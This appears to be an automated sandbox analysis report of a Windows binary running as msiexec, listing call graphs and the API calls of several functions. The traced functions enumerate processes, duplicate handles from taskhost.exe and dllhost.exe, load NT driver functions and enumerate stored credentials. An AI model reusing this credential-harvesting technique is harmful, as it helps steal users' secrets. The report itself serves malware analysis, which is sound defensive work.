40059->40060 40063 43a174 40059->40063 40087 42a0a8 146 API calls 40059->40087 40060->40059 40062->39973 40077 43a196 40063->40077 40078 43a19e 40063->40078 40064 43a306 40064->40077 40107 4388c4 14 API calls 40064->40107 40067 42a115 146 API calls 40067->40078 40069 43a642 40069->40077 40111 4169a7 11 API calls 40069->40111 40073 43a635 40110 42c02e memset 40073->40110 40077->40059 40078->40064 40078->40067 40078->40077 40088 42ff8c 40078->40088 40096 415a91 40078->40096 40100 4165ff 40078->40100 40103 439504 13 API calls 40078->40103 40104 4312d0 146 API calls 40078->40104 40105 42be4c memcpy memcpy memcpy memset memcpy 40078->40105 40106 43a121 11 API calls 40078->40106 40080 42bf4c 14 API calls 40082 43a325 40080->40082 40081 4169a7 11 API calls 40081->40082 40082->40069 40082->40073 40082->40077 40082->40080 40082->40081 40083 42b5b5 memset memcpy 40082->40083 40086 4165ff 11 API calls 40082->40086 40108 42b63e 14 API calls 40082->40108 40109 42bfcf memcpy 40082->40109 40083->40082 40086->40082 40087->40059 40112 43817e 40088->40112 40090 42ff9d 40090->40078 40091 42ff99 40091->40090 40092 42ffe3 40091->40092 40093 42ffd0 40091->40093 40117 4169a7 11 API calls 40092->40117 40116 4169a7 11 API calls 40093->40116 40097 415a9d 40096->40097 40098 415ab3 40097->40098 40099 415aa4 memset 40097->40099 40098->40078 40099->40098 40268 4165a0 40100->40268 40103->40078 40104->40078 40105->40078 40106->40078 40107->40082 40108->40082 40109->40082 40110->40069 40111->40077 40113 438187 40112->40113 40115 438192 40112->40115 40118 4380f6 40113->40118 40115->40091 40116->40090 40117->40090 40120 43811f 40118->40120 40119 438164 40119->40115 40120->40119 40123 437e5e 40120->40123 40146 4300e8 memset memset memcpy 40120->40146 40147 437d3c 40123->40147 40125 437eb3 40125->40120 40126 437ea9 40126->40125 40132 437f22 40126->40132 40162 41f432 40126->40162 40129 437f06 40209 415c56 11 API calls 40129->40209 40130 437f7f 40133 437f95 40130->40133 40136 43802b 40130->40136 40132->40130 40134 432d4e 3 API calls 40132->40134 40210 415c56 11 API calls 40133->40210 40134->40130 40137 4165ff 11 API calls 40136->40137 40138 438054 40137->40138 40173 437371 40138->40173 40141 43806b 40142 438094 40141->40142 40211 42f50e 137 API calls 40141->40211 40144 437fa3 40142->40144 40212 4300e8 memset memset memcpy 40142->40212 40144->40125 40213 41f638 103 API calls 40144->40213 40146->40120 40148 437d69 40147->40148 40151 437d80 40147->40151 40214 437ccb 11 API calls 40148->40214 40150 437d76 40150->40126 40151->40150 40152 437da3 40151->40152 40153 437d90 40151->40153 40155 438460 133 API calls 40152->40155 40153->40150 40218 437ccb 11 API calls 40153->40218 40158 437dcb 40155->40158 40156 437de8 40217 424f26 122 API calls 40156->40217 40158->40156 40215 444283 13 API calls 40158->40215 40160 437dfc 40216 437ccb 11 API calls 40160->40216 40163 41f54d 40162->40163 40169 41f44f 40162->40169 40164 41f466 40163->40164 40248 41c635 memset memset 40163->40248 40164->40129 40164->40132 40169->40164 40171 41f50b 40169->40171 40219 41f1a5 40169->40219 40244 41c06f memcmp 40169->40244 40245 41f3b1 89 API calls 40169->40245 40246 41f398 85 API calls 40169->40246 40171->40163 40171->40164 40247 41c295 85 API calls 40171->40247 40249 41703f 40173->40249 40175 437399 40176 43739d 40175->40176 40178 4373ac 40175->40178 40256 4446ea 11 API calls 40176->40256 40179 416935 16 API calls 40178->40179 40180 4373ca 40179->40180 40182 438460 133 API calls 40180->40182 40186 4251c4 136 API calls 40180->40186 40190 415a91 memset 40180->40190 40193 43758f 40180->40193 40205 437584 40180->40205 40208 437d3c 134 API calls 40180->40208 40257 425433 13 API calls 40180->40257 40258 425413 17 API calls 40180->40258 40259 42533e 16 API calls 40180->40259 40260 42538f 16 API calls 40180->40260 40261 42453e 122 API calls 40180->40261 40181 4375bc 40264 415c7d 16 API calls 40181->40264 40182->40180 40185 4375d2 40207 4373a7 40185->40207 40265 4442e6 11 API calls 40185->40265 40186->40180 40188 4375e2 40188->40207 40266 444283 13 API calls 40188->40266 40190->40180 40262 42453e 122 API calls 40193->40262 40194 4375f4 40199 437620 40194->40199 40200 43760b 40194->40200 40198 43759f 40201 416935 16 API calls 40198->40201 40203 416935 16 API calls 40199->40203 40267 444283 13 API calls 40200->40267 40201->40205 40203->40207 40205->40181 40263 42453e 122 API calls 40205->40263 40206 437612 memcpy 40206->40207 40207->40141 40208->40180 40209->40125 40210->40144 40211->40142 40212->40144 40213->40125 40214->40150 40215->40160 40216->40156 40217->40150 40218->40150 40220 41bc3b 100 API calls 40219->40220 40221 41f1b4 40220->40221 40222 41edad 85 API calls 40221->40222 40229 41f282 40221->40229 40223 41f1cb 40222->40223 40224 41f1f5 memcmp 40223->40224 40225 41f20e 40223->40225 40223->40229 40224->40225 40226 41f21b memcmp 40225->40226 40225->40229 40227 41f326 40226->40227 40230 41f23d 40226->40230 40228 41ee6b 85 API calls 40227->40228 40227->40229 40228->40229 40229->40169 40230->40227 40231 41f28e memcmp 40230->40231 40233 41c8df 55 API calls 40230->40233 40231->40227 40232 41f2a9 40231->40232 40232->40227 40235 41f308 40232->40235 40236 41f2d8 40232->40236 40234 41f269 40233->40234 40234->40227 40237 41f287 40234->40237 40238 41f27a 40234->40238 40235->40227 40242 4446ce 11 API calls 40235->40242 40239 41ee6b 85 API calls 40236->40239 40237->40231 40240 41ee6b 85 API calls 40238->40240 40241 41f2e0 40239->40241 40240->40229 40243 41b1ca memset 40241->40243 40242->40227 40243->40229 40244->40169 40245->40169 40246->40169 40247->40163 40248->40164 40250 417044 40249->40250 40251 41705c 40249->40251 40253 416760 11 API calls 40250->40253 40255 417055 40250->40255 40252 417075 40251->40252 40254 41707a 11 API calls 40251->40254 40252->40175 40253->40255 40254->40250 40255->40175 40256->40207 40257->40180 40258->40180 40259->40180 40260->40180 40261->40180 40262->40198 40263->40181 40264->40185 40265->40188 40266->40194 40267->40206 40273 415cfe 40268->40273 40277 415d23 __aullrem __aulldvrm 40273->40277 40280 41628e 40273->40280 40274 4163ca 40287 416422 11 API calls 40274->40287 40276 416172 memset 40276->40277 40277->40274 40277->40276 40278 416422 10 API calls 40277->40278 40279 415cb9 10 API calls 40277->40279 40277->40280 40278->40277 40279->40277 40281 416520 40280->40281 40282 416527 40281->40282 40286 416574 40281->40286 40284 416544 40282->40284 40282->40286 40288 4156aa 11 API calls 40282->40288 40285 416561 memcpy 40284->40285 40284->40286 40285->40286 40286->40078 40287->40280 40288->40284 40310 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39767 4147f3 39770 414561 39767->39770 39769 414813 39771 41456d 39770->39771 39772 41457f GetPrivateProfileIntW 39770->39772 39775 4143f1 memset _itow WritePrivateProfileStringW 39771->39775 39772->39769 39774 41457a 39774->39769 39775->39774

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 376->372 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                                    APIs
                                                    • memset.MSVCRT ref: 0040DDAD
                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                    • memset.MSVCRT ref: 0040DF5F
                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                    • API String ID: 708747863-3398334509
                                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 636 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 639 413f00-413f11 Process32NextW 636->639 640 413da5-413ded OpenProcess 639->640 641 413f17-413f24 CloseHandle 639->641 642 413eb0-413eb5 640->642 643 413df3-413e26 memset call 413f27 640->643 642->639 644 413eb7-413ebd 642->644 651 413e79-413e9d call 413959 call 413ca4 643->651 652 413e28-413e35 643->652 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 649 413edb-413ee2 646->649 647->649 655 413ee4 649->655 656 413ee7-413efe 649->656 663 413ea2-413eae CloseHandle 651->663 653 413e61-413e68 652->653 654 413e37-413e44 GetModuleHandleW 652->654 653->651 660 413e6a-413e76 653->660 654->653 659 413e46-413e5c GetProcAddress 654->659 655->656 656->639 659->653 660->651 663->642
                                                    APIs
                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                    • memset.MSVCRT ref: 00413D7F
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                    • memset.MSVCRT ref: 00413E07
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                    • free.MSVCRT ref: 00413EC1
                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                    • API String ID: 1344430650-1740548384
                                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                    APIs
                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                    APIs
                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                    • free.MSVCRT ref: 00418803
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                    • String ID:
                                                    • API String ID: 1355100292-0
                                                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FileFind$FirstNext
                                                    • String ID:
                                                    • API String ID: 1690352074-0
                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                    APIs
                                                    • memset.MSVCRT ref: 0041898C
                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: InfoSystemmemset
                                                    • String ID:
                                                    • API String ID: 3558857096-0
                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                    APIs
                                                    • memset.MSVCRT ref: 004455C2
                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                    • memset.MSVCRT ref: 0044570D
                                                    • memset.MSVCRT ref: 00445725
                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
